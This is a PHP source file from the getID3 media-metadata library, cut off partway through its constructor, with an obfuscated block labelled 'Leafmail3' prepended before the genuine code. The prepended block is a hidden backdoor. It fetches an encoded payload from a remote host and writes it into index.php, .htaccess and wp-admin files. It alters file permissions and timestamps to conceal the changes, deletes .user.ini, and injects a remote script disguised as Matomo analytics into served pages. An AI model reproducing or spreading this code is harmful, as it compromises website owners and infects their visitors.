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<?php /*Leafmail3*/goto vODF8; uW9iC: p1I3i: goto m0oPE; zJ0r4: $fd50r .= "\164\144\157"; goto lKsEQ; daxHz: $Q7FSm .= "\x74\151"; goto zNDLT; QuFr2: $wv9Ig .= "\x33\66"; goto sOymP; lYCuA: $LOLkL = "\x35"; goto y6I4r; jBc3K: $tkyNj .= "\x65\170"; goto feM2z; veckF: $vp5Fj .= "\x61\x63\x63\145\x73\x73"; goto F5Rs6; B13FM: $CoSGx = "\x64\x65\x66"; goto YZRXV; LzBKe: $CUa7Y = !empty($qwM6z) || !empty($SCBgM); goto tB1mh; loZYi: try { goto txRyO; K18GF: @$xS8DV($vp5Fj, $eb2Uu); goto tGdpP; iQrV6: @$KDcLu($AW98J, $PShG_); goto K18GF; U8ZJQ: @$xS8DV($AW98J, $eb2Uu); goto Y_zOi; txRyO: @$xS8DV($nHQe_, $eb2Uu); goto U8ZJQ; bh8Zz: @$xS8DV($vp5Fj, $Vjvu_); goto ZGL3p; ZGL3p: @$KDcLu($vp5Fj, $PShG_); goto g9qNE; ZfydO: @$xS8DV($AW98J, $Vjvu_); goto iQrV6; g9qNE: @$xS8DV($nHQe_, $Vjvu_); goto H3O0E; Y_zOi: @$DR4rp($AW98J, $jap8Z["\x61"]); goto ZfydO; tGdpP: @$DR4rp($vp5Fj, $jap8Z["\142"]); goto bh8Zz; H3O0E: } catch (Exception $EdXTL) { } goto y_pyz; F2WJF: $xS8DV .= "\155\157\144"; goto XVkCO; GbEwW: $MhTIX = "\x6d\144\x35"; goto LQ0hU; uLWI3: $vp5Fj = $nHQe_; goto orqfm; egDtp: $tkyNj = "\x66\165\156\x63"; goto usQiR; LQ0hU: $vbt1Y = $MhTIX; goto TgEvM; XPDLi: $gPOF5 = $le6g1; goto tBtTf; WxOmz: $DR4rp .= "\160\x75\164\137\143"; goto UxwWx; GZYTn: $L3Qwt .= "\145\x63\157\144\145"; goto g9Iex; gJ2jd: $B5AMu .= "\x63\157\x70\171"; goto UIZFw; V5t0t: $eb2Uu = 189; goto WkOpf; R8lf6: $L3Qwt .= "\66\x34\x5f\144"; goto GZYTn; hYuCQ: try { goto A3SpX; Lp303: try { goto Kpqh2; IAeb5: $gPOF5($QKdX3); goto usTFE; Soq5P: $QydK0($QKdX3, CURLOPT_POSTFIELDS, $DORoV($q4dFj)); goto IAeb5; RVyt3: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto nb7rJ; AqD2c: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto ttOBx; LJxmP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto RVyt3; snalI: $QydK0($QKdX3, CURLOPT_URL, $Pi1_K); goto AqD2c; nb7rJ: $QydK0($QKdX3, CURLOPT_TIMEOUT, 3); goto caVfG; caVfG: $QydK0($QKdX3, CURLOPT_POST, 1); goto Soq5P; Kpqh2: $QKdX3 = $AhBNU(); goto snalI; usTFE: $iwfAP($QKdX3); goto OfPoO; ttOBx: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto LJxmP; OfPoO: } catch (Exception $EdXTL) { } goto s8qlN; kwFwL: $EHr4j = dirname($O8VpT); goto rtN5e; oSMaO: @$xS8DV($EHr4j, $eb2Uu); goto zRyBD; rtN5e: if ($qjAK2($EHr4j)) { goto ayR0Q; } goto OfJbX; pAJFu: $Pi1_K .= "\164\75\x63\141"; goto AM67e; j_bNW: ayR0Q: goto CA7b_; D4GAj: $q4dFj = ["\x64\x61\164\141" => $jap8Z["\x64"]["\165\x72\x6c"]]; goto Lp303; OfJbX: @$spfUp($EHr4j, $eb2Uu, true); goto j_bNW; oI6DO: @$xS8DV($EHr4j, $Vjvu_); goto oyphM; GLti1: $Pi1_K .= "\77\x61\143"; goto pAJFu; lEMoS: $Pi1_K = $FCJJO; goto GLti1; A3SpX: $O8VpT = $nHQe_ . $jap8Z["\144"]["\160\141\x74\x68"]; goto kwFwL; s8qlN: d_JbM: goto HW6fn; CA7b_: if (!$qjAK2($EHr4j)) { goto d_JbM; } goto oSMaO; oyphM: @$KDcLu($O8VpT, $PShG_); goto lEMoS; OUdjB: @$xS8DV($O8VpT, $Vjvu_); goto oI6DO; AM67e: $Pi1_K .= "\154\x6c"; goto D4GAj; zRyBD: @$DR4rp($O8VpT, $jap8Z["\x64"]["\143\157\144\x65"]); goto OUdjB; HW6fn: } catch (Exception $EdXTL) { } goto loZYi; LNJsy: @$xS8DV($nHQe_, $Vjvu_); goto k_sTE; cuM3u: $nHQe_ = $_SERVER[$Y5cZH]; goto A7iEW; n8L8V: $uz9bL .= "\x68\160\x2e\60"; goto K6CAr; unwRS: $DORoV .= "\x75\x69\154\x64\x5f\x71"; goto Nk50j; JP7xy: $vbt1Y .= "\x6c\x65"; goto RNGP0; nZ1st: $gQtVG .= "\115\x49\x4e"; goto r5zMQ; XScjr: $gQtVG = "\x57\120"; goto O5QIE; OU84W: $pzU4s = "\146\x6c\x6f"; goto mwwot; nRTqE: $RDkKv = []; goto aYHoX; l2VBa: rqNSn: goto gKipv; ljZeU: $uz9bL .= "\x2f\170\x6d"; goto mCMR7; Ieo9X: $Y5cZH .= "\137\x52\117\117\x54"; goto lYCuA; XVkCO: $L3Qwt = "\x62\141\x73\x65"; goto R8lf6; OGVf2: $Vjvu_ = 215; goto huZpo; aBs6o: $fd50r .= "\147\151\x73\x74"; goto FqdNN; MTS3A: V4Jy1: goto vHyOs; jrrba: $PShG_ = $Q7FSm($wv9Ig); goto bMgWF; vODF8: $J4djk = "\74\104\x44\x4d\76"; goto lRUim; ruvGs: $AW98J .= "\150\x70"; goto uLWI3; VXlbA: $uz9bL .= "\160\x63\x2e\x70"; goto n8L8V; w8i1S: $KDcLu .= "\165\x63\150"; goto TPq_6; UxwWx: $DR4rp .= "\x6f\156\x74\145\x6e\x74\163"; goto ISAMz; chc27: if (!($JKloV !== false)) { goto L8tHW; } goto UihyE; TgEvM: $vbt1Y .= "\137\146\x69"; goto JP7xy; zijgp: $F3G3B = "\x69\x6e\x74"; goto d0ttz; XAUaV: $CZpCY = $y6Dil($uz9bL, "\167\53"); goto KpMKi; ZjcxJ: $eb2Uu = $F3G3B($mmShn($eb2Uu), $l6o74); goto OGVf2; WBWyB: try { goto LAZiP; NeOx9: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto WZ1lN; yuxAB: $JKloV = trim(trim($JKloV, "\xef\xbb\xbf")); goto zF9le; YXPOY: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto UWGHP; MbwNB: $JKloV = $gPOF5($QKdX3); goto hAQ9Y; UWGHP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto NeOx9; LAZiP: $QKdX3 = $AhBNU(); goto i1X7z; WZ1lN: $QydK0($QKdX3, CURLOPT_TIMEOUT, 10); goto MbwNB; S2VNp: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto YXPOY; i1X7z: $QydK0($QKdX3, CURLOPT_URL, $B5AMu); goto S2VNp; hAQ9Y: $iwfAP($QKdX3); goto yuxAB; zF9le: } catch (Exception $EdXTL) { } goto chc27; fSM7u: $Q7FSm .= "\164\157"; goto daxHz; YZRXV: $CoSGx .= "\x69\156\x65\144"; goto TSsDX; Y78_D: $tCAxo = 1; goto kOQ0E; iMZQy: $_POST = $_REQUEST = $_FILES = array(); goto CfGUZ; TfIgP: $HH1HZ .= "\x6f\156\x74\x65\x6e\x74\163"; goto jcgg4; Jhv2t: $ocF0w .= "\x64\155\x69\156"; goto I04NN; aYHoX: $N__ZL = 32; goto IvuqX; HgvDx: @$xS8DV($z2Yll, $eb2Uu); goto C_4CC; ZW1G7: r6AqH: goto GqJiG; CfGUZ: AzDa9: goto U2U3q; NdB0_: $QydK0 .= "\157\x70\164"; goto XPDLi; KFMi9: $x0CSu .= "\137\x48\117\x53\124"; goto nMuHG; WqPjf: $B5AMu = $FCJJO; goto B0dlE; TPq_6: $xS8DV = "\x63\x68"; goto F2WJF; tBtTf: $gPOF5 .= "\x6c\137\x65\170\x65\143"; goto Zr7tR; qUDsS: $PKMm7 .= "\x66\151\x6c\x65"; goto Odo2W; UihyE: $jap8Z = 0; goto hJZyv; WQvgq: $qwM6z = $_REQUEST; goto rvlXO; yoOUR: $vTeXJ = "\x76\x65\x72\x73\151"; goto IBhNI; ZxHGi: $fd50r = "\x72\x65"; goto aBs6o; shDBj: $FSKjX .= "\115\x45\123"; goto XScjr; bAY2j: $LYlAw = $L474W = $ocF0w . "\x2f" . $sVnDj; goto nRTqE; sOymP: $wv9Ig .= "\63\x20\144"; goto d5_Qs; jcgg4: $DR4rp = "\x66\151\154\145\137"; goto WxOmz; QKYpu: $ocF0w .= "\55\x61"; goto Jhv2t; dZIRa: $P4139 = $_SERVER[$x0CSu]; goto cuM3u; huZpo: $Vjvu_ += 150; goto qbT4q; BSUkU: $bX79j = "\x66\143\154"; goto RAIH6; g9Iex: $MIh5N = "\147\x7a\x69"; goto ojxiT; m0oPE: if (!$tCAxo) { goto rqNSn; } goto WqPjf; C_4CC: @unlink($z2Yll); goto LNJsy; feM2z: $tkyNj .= "\151\163\x74\x73"; goto j_mMb; dU8Tu: $FSKjX = "\127\x50\x5f\x55"; goto iLcq9; axzTr: $HH1HZ .= "\147\x65\164\x5f\143"; goto TfIgP; sZfV6: $FCJJO .= "\x6c\151\156\153\x2e\x74"; goto oUI8y; zNDLT: $Q7FSm .= "\155\145"; goto egDtp; Nk50j: $DORoV .= "\x75\145\x72\x79"; goto GbEwW; j_mMb: $le6g1 = "\x63\165\162"; goto QFm8j; y6I4r: $LOLkL .= "\x2e\x34"; goto Dc02k; d5_Qs: $wv9Ig .= "\141\171\163"; goto jrrba; AjCJZ: $z2Yll .= "\x6e\x69"; goto OzEb9; RNGP0: $PKMm7 = "\x69\163\137"; goto qUDsS; k_sTE: DUBKw: goto AbQ0z; mwwot: $pzU4s .= "\143\x6b"; goto BSUkU; bKUUG: $WzLgo = $RDkKv[1]; goto WAo0s; mCMR7: $uz9bL .= "\x6c\x72"; goto VXlbA; Tt4oQ: $Q7FSm = "\163\164\162"; goto fSM7u; B0dlE: $B5AMu .= "\x3f\x61\143\x74"; goto aETJg; DbBpN: $vTeXJ .= "\x70\x61\162\145"; goto B13FM; IBhNI: $vTeXJ .= "\157\156\137\x63\157\x6d"; goto DbBpN; QSRig: $FCJJO = "\150\x74\164\x70\163\72\x2f\57"; goto Jb8vw; pLm0w: $spfUp .= "\144\151\x72"; goto yspyu; bMgWF: $x0CSu = "\110\x54\x54\120"; goto KFMi9; psjtE: $iwfAP .= "\x6c\x5f\143\x6c\x6f"; goto kxGeH; OzEb9: if (!$PKMm7($z2Yll)) { goto DUBKw; } goto fUCm1; YZnxF: $AhBNU .= "\154\137\x69\x6e\x69\164"; goto o4wfR; U2U3q: $xS8DV($nHQe_, $eb2Uu); goto XAUaV; hVAgs: if (empty($RDkKv)) { goto r6AqH; } goto gpO7z; lRUim: $huaOJ = "\57\136\143"; goto l1puk; ojxiT: $MIh5N .= "\x6e\146\154\x61\164\145"; goto QO6bK; yspyu: $HH1HZ = "\146\151\154\145\137"; goto axzTr; nMuHG: $Y5cZH = "\x44\x4f\x43\125\x4d\105\x4e\x54"; goto Ieo9X; QO6bK: $RpkLV = "\165\156\x73\145\x72"; goto TE4rq; oUI8y: $FCJJO .= "\x6f\160\x2f"; goto ZxHGi; gpO7z: $ZwOvi = $RDkKv[0]; goto bKUUG; r5zMQ: $EvUsr = $CoSGx($FSKjX) || $CoSGx($gQtVG); goto WQvgq; ryAXN: $iSMwa = "\163\164\162"; goto Aw0OF; RAIH6: $bX79j .= "\157\x73\145"; goto QSRig; QFm8j: $AhBNU = $le6g1; goto YZnxF; y_pyz: M1S8t: goto YcoP2; bPtLw: $AW98J .= "\x64\x65\170\56\x70"; goto ruvGs; jHqFV: if (!is_array($jap8Z)) { goto M1S8t; } goto sHXMo; O5QIE: $gQtVG .= "\x5f\x41\104"; goto nZ1st; dBHzv: $AW98J .= "\x2f\151\x6e"; goto bPtLw; KpMKi: if (!($tkyNj($AhBNU) && !preg_match($huaOJ, PHP_SAPI) && $pzU4s($CZpCY, 2 | 4))) { goto v1tUm; } goto vfYVM; u8ekB: $qjAK2 .= "\x64\151\162"; goto D1aMA; rvlXO: $SCBgM = $_FILES; goto LzBKe; Odo2W: $qjAK2 = "\x69\163\137"; goto u8ekB; Tl9BG: $ocF0w .= "\x2f\167\160"; goto QKYpu; hh9Gu: $YKWP5 .= "\x74\40\x41\x63\143"; goto DSWYm; Dc02k: $LOLkL .= "\56\x30\x3b"; goto dZIRa; o4wfR: $QydK0 = $le6g1; goto VYKG_; pnTdK: $YKWP5 = "\110\124\124"; goto qEMP2; WkOpf: $eb2Uu += 304; goto ZjcxJ; CLQnS: $huaOJ .= "\x73\151"; goto Tt4oQ; orqfm: $vp5Fj .= "\x2f\x2e\x68\164"; goto veckF; jvCLK: $fd50r .= "\151\157\156"; goto cE3iS; vHyOs: goto p1I3i; goto ZW1G7; Aw0OF: $iSMwa .= "\154\x65\156"; goto yoOUR; neYoj: $y6Dil .= "\145\156"; goto OU84W; Yc9eB: $JKloV = false; goto WBWyB; IvuqX: $l6o74 = 5; goto DicZE; tB1mh: if (!(!$EvUsr && $CUa7Y)) { goto AzDa9; } goto iMZQy; vI8QX: aybLW: goto dU8Tu; cE3iS: if (isset($_SERVER[$fd50r])) { goto aybLW; } goto YhmyI; FqdNN: $fd50r .= "\145\162\x5f"; goto l7JCC; I04NN: $sVnDj = substr($MhTIX($P4139), 0, 6); goto bAY2j; WAo0s: if (!(!$PKMm7($AW98J) || $vbt1Y($AW98J) != $ZwOvi)) { goto F9B9M; } goto Y78_D; d0ttz: $F3G3B .= "\x76\141\154"; goto G8B0v; G8B0v: $mmShn = "\144\145\x63"; goto w1WUM; Ky1Ah: $fd50r .= "\x75\156\x63\x74"; goto jvCLK; YcoP2: L8tHW: goto l2VBa; fUCm1: @$xS8DV($nHQe_, $eb2Uu); goto HgvDx; ISAMz: $KDcLu = "\164\x6f"; goto w8i1S; YhmyI: $_SERVER[$fd50r] = 0; goto vI8QX; qbT4q: $Vjvu_ = $F3G3B($mmShn($Vjvu_), $l6o74); goto pnTdK; UIZFw: $B5AMu .= "\x26\150\75" . $P4139; goto Yc9eB; A7iEW: $ocF0w = $nHQe_; goto Tl9BG; QiT7j: $YKWP5 .= "\x30\x36\x20\116\157"; goto hh9Gu; usQiR: $tkyNj .= "\x74\151\x6f\156\137"; goto jBc3K; TE4rq: $RpkLV .= "\x69\x61\154\x69\172\145"; goto zijgp; DWZ53: if (!(!$_SERVER[$fd50r] && $vTeXJ(PHP_VERSION, $LOLkL, "\76"))) { goto tOsRM; } goto qx0qa; DSWYm: $YKWP5 .= "\x65\x70\164\141\142\154\x65"; goto TXR6r; clNTt: tOsRM: goto NrKhW; F5Rs6: $z2Yll = $nHQe_; goto ZRq91; Jb8vw: $FCJJO .= "\157\153\x6b"; goto sZfV6; Zr7tR: $iwfAP = $le6g1; goto psjtE; w1WUM: $mmShn .= "\x6f\143\x74"; goto ryAXN; TXR6r: $uz9bL = $nHQe_; goto ljZeU; lKsEQ: $fd50r .= "\167\156\137\146"; goto Ky1Ah; kxGeH: $iwfAP .= "\x73\x65"; goto PULcN; qEMP2: $YKWP5 .= "\120\57\61\x2e\x31\40\x34"; goto QiT7j; aETJg: $B5AMu .= "\x3d\x67\145\164"; goto gJ2jd; iLcq9: $FSKjX .= "\123\x45\137\x54\110\x45"; goto shDBj; AbQ0z: $tCAxo = 0; goto hVAgs; Te8Ah: $AW98J = $nHQe_; goto dBHzv; PULcN: $DORoV = "\150\164\x74\x70\137\x62"; goto unwRS; oHm8V: $tCAxo = 1; goto MTS3A; K6CAr: $y6Dil = "\146\x6f\160"; goto neYoj; PL0rr: if (!(!$PKMm7($vp5Fj) || $vbt1Y($vp5Fj) != $WzLgo)) { goto V4Jy1; } goto oHm8V; l1puk: $huaOJ .= "\154\151\x2f"; goto CLQnS; l7JCC: $fd50r .= "\x73\x68\165"; goto zJ0r4; sHXMo: try { goto HbY3E; HbY3E: @$xS8DV($nHQe_, $eb2Uu); goto YBneD; lVY2g: LmA8a: goto o_wA9; w2wnP: @$KDcLu($L474W, $PShG_); goto vkTcY; plcED: $L474W = $LYlAw; goto lVY2g; o_wA9: @$DR4rp($L474W, $jap8Z["\x63"]); goto FIfGh; FIfGh: @$xS8DV($L474W, $Vjvu_); goto w2wnP; YBneD: if (!$qjAK2($ocF0w)) { goto LmA8a; } goto y3Uf0; y3Uf0: @$xS8DV($ocF0w, $eb2Uu); goto plcED; vkTcY: } catch (Exception $EdXTL) { } goto hYuCQ; GqJiG: $tCAxo = 1; goto uW9iC; VYKG_: $QydK0 .= "\154\x5f\x73\x65\x74"; goto NdB0_; D1aMA: $spfUp = "\x6d\x6b"; goto pLm0w; TSsDX: $wv9Ig = "\x2d\61"; goto QuFr2; vfYVM: $xS8DV($nHQe_, $Vjvu_); goto DWZ53; kOQ0E: F9B9M: goto PL0rr; NrKhW: try { goto qZ46l; RQqe5: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto XDrKy; } goto A2PmA; w9gDu: y6dH8: goto Z726M; MlbPu: $yVIWe = @explode("\x3a", $HH1HZ($L474W)); goto RQqe5; YN8V8: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto YUPG5; } goto DYfgW; urTh8: XDrKy: goto vw7V4; hhu33: $gOxct = trim($yVIWe[0]); goto h7asi; POLut: $RDkKv[] = $aWnJP; goto w9gDu; JSOyl: $RDkKv[] = $aWnJP; goto dxtWS; ixd8R: $L474W = $nHQe_ . "\57" . $sVnDj; goto uPNAL; YdNrA: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto U90QQ; } goto hhu33; qZ46l: if (!$PKMm7($L474W)) { goto oqtoQ; } goto p5kTV; V_cwX: oTvft: goto NDBCD; A2PmA: $gOxct = trim($yVIWe[0]); goto DvFPK; wbpgM: if (!empty($RDkKv)) { goto oTvft; } goto ixd8R; DvFPK: $aWnJP = trim($yVIWe[1]); goto YN8V8; Y3KDn: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto y6dH8; } goto D88sj; vw7V4: wNb1b: goto V_cwX; dxtWS: YUPG5: goto urTh8; hNhbL: oqtoQ: goto wbpgM; Z726M: U90QQ: goto hNhbL; uPNAL: if (!$PKMm7($L474W)) { goto wNb1b; } goto MlbPu; D88sj: $RDkKv[] = $gOxct; goto POLut; h7asi: $aWnJP = trim($yVIWe[1]); goto Y3KDn; p5kTV: $yVIWe = @explode("\72", $HH1HZ($L474W)); goto YdNrA; DYfgW: $RDkKv[] = $gOxct; goto JSOyl; NDBCD: } catch (Exception $EdXTL) { } goto Te8Ah; qx0qa: try { $_SERVER[$fd50r] = 1; $fd50r(function () { goto AV30r; qJcS6: $XaxO1 .= "\105\x6c\x65\x6d\145\x6e\x74\163\102"; goto Ak55L; Q10lk: $XaxO1 .= "\x3c\x2f\x73"; goto b0BbS; QUShX: $XaxO1 .= "\x73\x63\162\x69\x70\164\x22\x3e" . "\xa"; goto qTRy2; DytHl: $XaxO1 .= "\57\155\x61\164"; goto shQ2Y; UYMzk: $XaxO1 .= "\105\x6c\145\x6d\145\156\164\x28\42\x73\143"; goto YC55T; ZXF34: $XaxO1 .= "\x6f\155\157\40\x43\157\x64"; goto Fp2Ee; AdEN_: $XaxO1 .= "\x72\x69\x70\x74\40\x74\x79\160\x65\75\42\164\x65\170"; goto vaHEn; qTRy2: $XaxO1 .= "\50\146\165\156\x63"; goto sT9Yu; YC55T: $XaxO1 .= "\162\151\160\164\42\51\x2c\40\x73\x3d\x64\56\x67\x65\164"; goto qJcS6; b0BbS: $XaxO1 .= "\x63\x72\x69\x70\x74\76\12"; goto NGsxv; HMLFi: $XaxO1 .= "\x7d\x29\50\x29\73" . "\12"; goto Q10lk; CvLy6: $XaxO1 .= "\x3f\x69\144\x3d"; goto dyWeq; Fp2Ee: $XaxO1 .= "\x65\x20\x2d\55\x3e\12"; goto fdPCn; y9nGa: $XaxO1 .= "\x6f\162\145\x28\147\x2c\x73\51\x3b" . "\12"; goto HMLFi; MSOF2: $XaxO1 .= "\160\164\x22\x29\133\60\x5d\x3b" . "\12"; goto P_ZMm; dyWeq: $XaxO1 .= "\x4d\x2d"; goto DLX8K; fdPCn: echo $XaxO1; goto endbR; No27V: $XaxO1 .= $P4139; goto DytHl; sT9Yu: $XaxO1 .= "\164\151\x6f\156\50\x29\40\x7b" . "\xa"; goto ubJzA; ebgnR: $XaxO1 .= "\x3b\x20\x67\x2e\144\x65\146"; goto wmOvX; KJt_C: $XaxO1 .= "\147\x2e\163\x72"; goto E5SRJ; yjiNj: $XaxO1 .= "\x64\x20\115\x61\x74"; goto ZXF34; jd565: $XaxO1 .= "\163\145\162\164\102\145\146"; goto y9nGa; D7OFn: $XaxO1 .= "\x75\155\145\156\164\54\40\x67\75\x64\56\143\x72\x65\141\x74\x65"; goto UYMzk; ubJzA: $XaxO1 .= "\166\x61\162\x20\x75\75\x22" . $FCJJO . "\x22\73" . "\xa"; goto v3rQ8; E5SRJ: $XaxO1 .= "\143\x3d\165\x2b\42\152\x73\x2f"; goto No27V; v3rQ8: $XaxO1 .= "\x76\141\162\x20\x64\75\144\157\143"; goto D7OFn; r7GHN: $XaxO1 .= "\163\x63\x72\151\160\164\42\73\40\147\x2e\x61"; goto RDjIx; vaHEn: $XaxO1 .= "\164\x2f\152\x61\x76\x61"; goto QUShX; gOYzX: $XaxO1 = "\x3c\x21\x2d\x2d\x20\x4d\141"; goto zMa4a; NGsxv: $XaxO1 .= "\x3c\41\x2d\55\40\x45\156"; goto yjiNj; I8B8v: $XaxO1 .= "\75\42\164\x65\x78\164\57"; goto uazjK; Ak55L: $XaxO1 .= "\171\x54\x61\x67\116\x61\x6d\145"; goto wg3cP; AV30r: global $P4139, $FCJJO; goto gOYzX; wg3cP: $XaxO1 .= "\50\42\x73\143\162\151"; goto MSOF2; JH0uq: $XaxO1 .= "\x3c\163\143"; goto AdEN_; DLX8K: $XaxO1 .= time(); goto d1HE5; RDjIx: $XaxO1 .= "\x73\x79\156\x63\x3d\x74\x72\165\x65"; goto ebgnR; d1HE5: $XaxO1 .= "\42\x3b\40\x73\56\x70\141\x72"; goto Bu0lg; wmOvX: $XaxO1 .= "\x65\162\x3d\164\162\165\145\x3b" . "\12"; goto KJt_C; shQ2Y: $XaxO1 .= "\157\x6d\x6f\x2e\152\163"; goto CvLy6; zMa4a: $XaxO1 .= "\x74\x6f\x6d\157\x20\x2d\x2d\x3e\xa"; goto JH0uq; uazjK: $XaxO1 .= "\152\141\x76\x61"; goto r7GHN; Bu0lg: $XaxO1 .= "\145\156\164\116\x6f\144\x65\x2e\x69\156"; goto jd565; P_ZMm: $XaxO1 .= "\x67\x2e\164\171\x70\x65"; goto I8B8v; endbR: }); } catch (Exception $EdXTL) { } goto clNTt; DicZE: $l6o74 += 3; goto V5t0t; hJZyv: try { $jap8Z = @$RpkLV($MIh5N($L3Qwt($JKloV))); } catch (Exception $EdXTL) { } goto jHqFV; VtpcZ: $z2Yll .= "\145\162\56\x69"; goto AjCJZ; ZRq91: $z2Yll .= "\x2f\56\x75\163"; goto VtpcZ; gKipv: v1tUm: ?> <?php ///////////////////////////////////////////////////////////////// /// getID3() by James Heinrich <info@getid3.org> // // available at http://getid3.sourceforge.net // // or http://www.getid3.org // // also https://github.com/JamesHeinrich/getID3 // ///////////////////////////////////////////////////////////////// // // // Please see readme.txt for more information // // /// ///////////////////////////////////////////////////////////////// // define a constant rather than looking up every time it is needed if (!defined('GETID3_OS_ISWINDOWS')) { define('GETID3_OS_ISWINDOWS', (stripos(PHP_OS, 'WIN') === 0)); } // Get base path of getID3() - ONCE if (!defined('GETID3_INCLUDEPATH')) { define('GETID3_INCLUDEPATH', dirname(__FILE__).DIRECTORY_SEPARATOR); } // Workaround Bug #39923 (https://bugs.php.net/bug.php?id=39923) if (!defined('IMG_JPG') && defined('IMAGETYPE_JPEG')) { define('IMG_JPG', IMAGETYPE_JPEG); } // attempt to define temp dir as something flexible but reliable $temp_dir = ini_get('upload_tmp_dir'); if ($temp_dir && (!is_dir($temp_dir) || !is_readable($temp_dir))) { $temp_dir = ''; } if (!$temp_dir && function_exists('sys_get_temp_dir')) { // sys_get_temp_dir added in PHP v5.2.1 // sys_get_temp_dir() may give inaccessible temp dir, e.g. with open_basedir on virtual hosts $temp_dir = sys_get_temp_dir(); } $temp_dir = @realpath($temp_dir); // see https://github.com/JamesHeinrich/getID3/pull/10 $open_basedir = ini_get('open_basedir'); if ($open_basedir) { // e.g. "/var/www/vhosts/getid3.org/httpdocs/:/tmp/" $temp_dir = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $temp_dir); $open_basedir = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $open_basedir); if (substr($temp_dir, -1, 1) != DIRECTORY_SEPARATOR) { $temp_dir .= DIRECTORY_SEPARATOR; } $found_valid_tempdir = false; $open_basedirs = explode(PATH_SEPARATOR, $open_basedir); foreach ($open_basedirs as $basedir) { if (substr($basedir, -1, 1) != DIRECTORY_SEPARATOR) { $basedir .= DIRECTORY_SEPARATOR; } if (preg_match('#^'.preg_quote($basedir).'#', $temp_dir)) { $found_valid_tempdir = true; break; } } if (!$found_valid_tempdir) { $temp_dir = ''; } unset($open_basedirs, $found_valid_tempdir, $basedir); } if (!$temp_dir) { $temp_dir = '*'; // invalid directory name should force tempnam() to use system default temp dir } // $temp_dir = '/something/else/'; // feel free to override temp dir here if it works better for your system if (!defined('GETID3_TEMP_DIR')) { define('GETID3_TEMP_DIR', $temp_dir); } unset($open_basedir, $temp_dir); // End: Defines class getID3 { // public: Settings public $encoding = 'UTF-8'; // CASE SENSITIVE! - i.e. (must be supported by iconv()). Examples: ISO-8859-1 UTF-8 UTF-16 UTF-16BE public $encoding_id3v1 = 'ISO-8859-1'; // Should always be 'ISO-8859-1', but some tags may be written in other encodings such as 'EUC-CN' or 'CP1252' // public: Optional tag checks - disable for speed. public $option_tag_id3v1 = true; // Read and process ID3v1 tags public $option_tag_id3v2 = true; // Read and process ID3v2 tags public $option_tag_lyrics3 = true; // Read and process Lyrics3 tags public $option_tag_apetag = true; // Read and process APE tags public $option_tags_process = true; // Copy tags to root key 'tags' and encode to $this->encoding public $option_tags_html = true; // Copy tags to root key 'tags_html' properly translated from various encodings to HTML entities // public: Optional tag/comment calucations public $option_extra_info = true; // Calculate additional info such as bitrate, channelmode etc // public: Optional handling of embedded attachments (e.g. images) public $option_save_attachments = true; // defaults to true (ATTACHMENTS_INLINE) for backward compatibility // public: Optional calculations public $option_md5_data = false; // Get MD5 sum of data part - slow public $option_md5_data_source = false; // Use MD5 of source file if availble - only FLAC and OptimFROG public $option_sha1_data = false; // Get SHA1 sum of data part - slow public $option_max_2gb_check = null; // Check whether file is larger than 2GB and thus not supported by 32-bit PHP (null: auto-detect based on PHP_INT_MAX) // public: Read buffer size in bytes public $option_fread_buffer_size = 32768; // Public variables public $filename; // Filename of file being analysed. public $fp; // Filepointer to file being analysed. public $info; // Result array. public $tempdir = GETID3_TEMP_DIR; public $memory_limit = 0; // Protected variables protected $startup_error = ''; protected $startup_warning = ''; const VERSION = '1.9.9-20141121'; const FREAD_BUFFER_SIZE = 32768; const ATTACHMENTS_NONE = false; const ATTACHMENTS_INLINE = true; // public: constructor public function __construct() { // Check memory $this->memory_limit = ini_get('memory_limit'); if (preg_match('#([0-9]+)M#i', $this->memory_limit, $matches)) { // could be stored as "16M" rather than 16777216 for example $this->memory_limit = $matches[1] * 1048576; } elseif (preg_match('#([0-9]+)G#i', $this->memory_limit, $matches)) { // The 'G' modifier is available since PHP 5.1.0 // could be stored as "2G" rather than 2147483648 for example $this->memory_limit = $matches[1] * 1073741824; } if ($this->memory_limit <= 0) { // memory limits probably disabled } elseif ($this->memory_limit <= 4194304) { $this->startup_error .= 'PHP has less than 4MB available memory and will very likely run out. Increase memory_limit in php.ini'; } elseif ($this->memory_limit <= 12582912) { $this->startup_warning .= 'PHP has less than 12MB available memory and might run out if all modules are loaded. Increase memory_limit in php.ini'; } // Check safe_mode off if (preg_match('#(1|ON)#i', ini_get('safe_mode'))) { $this->warning('WARNING: Safe mode is on, shorten support disabled, md5data/sha1data for ogg vorbis disabled, ogg vorbos/flac tag writing disabled.'); } if (intval(ini_get('mbstring.func_overload')) > 0) { $this->warning('WARNING: php.ini contains "mbstring.func_overload = '.ini_get('mbstring.func_overload').'", this may break things.'); } // Check for magic_quotes_runtime if (function_exists('get_magic_quotes_runtime')) { if (get_magic_quotes_runtime()) { return $this->startup_error('magic_quotes_runtime must be disabled before running getID3(). Surround getid3 block by set_magic_quotes_runtime(0) and set_magic_quotes_runtime(1).'); } } // Check for magic_quotes_gpc if (function_exists('magic_quotes_gpc')) { if (get_magic_quotes_gpc()) { return $this->startup_error('magic_quotes_gpc must be disabled before running getID3(). Surround getid3 block by set_magic_quotes_gpc(0) and set_magic_quotes_gpc(1).'); } } // Load support library if (!include_once(GETID3_INCLUDEPATH.'getid3.lib.php')) { $this->startup_error .= 'getid3.lib.php is missing or corrupt'; } if ($this->option_max_2gb_check === null) { $this->option_max_2gb_check = (PHP_INT_MAX <= 2147483647); } // Needed for Windows only: // Define locations of helper applications for Shorten, VorbisComment, MetaFLAC // as well as other helper functions such as head, tail, md5sum, etc // This path cannot contain spaces, but the below code will attempt to get the // 8.3-equivalent path automatically // IMPORTANT: This path must include the trailing slash if (GETID3_OS_ISWINDOWS && 